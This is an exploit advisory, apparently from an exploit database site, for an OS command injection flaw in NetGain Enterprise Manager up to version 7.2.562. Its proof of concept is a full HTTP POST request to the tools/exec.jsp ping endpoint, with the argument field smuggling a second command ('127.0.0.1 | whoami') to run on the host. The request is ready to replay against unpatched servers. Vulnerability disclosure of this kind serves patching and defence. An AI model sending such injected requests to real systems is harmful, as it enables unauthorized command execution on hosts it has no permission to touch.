NetGain Enterprise Manager 7.2.562 Command Execution

2017.03.04
Credit: MrChaZ
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-78

# Exploit Title: NetGain Enterprise Manager a aPinga Command Injection # Date: 23.02.2017 # Exploit Author: MrChaZ # Vendor Homepage: http://www.netgain-systems.com/ # Version: <= v7.2.562 build 853 # Tested on: Windows 10 Pro 64-bit (10,0 Build 14393 Description: =========================================================================== Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. https://www.owasp.org/index.php/Command_Injection Vulnerable Menu: =========================================================================== [+] Tools a Ping Proof of Concept: =========================================================================== POST /u/jsp/tools/exec.jsp HTTP/1.1 Host: 192.168.0.13:8081 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://192.168.0.13:8081/u/index.jsp Content-Length: 97 Cookie: JSESSIONID=542B58462355E4E3B99FAA42842E62FF Connection: close Pragma: no-cache Cache-Control: no-cache command=cmd+%2Fc+ping&argument=127.0.0.1+%7C+whoami&async_output=ping1487856455258&isWindows=true - HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: text/html;charset=utf-8 Content-Length: 70 Date: Thu, 23 Feb 2017 13:27:40 GMT Connection: close


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top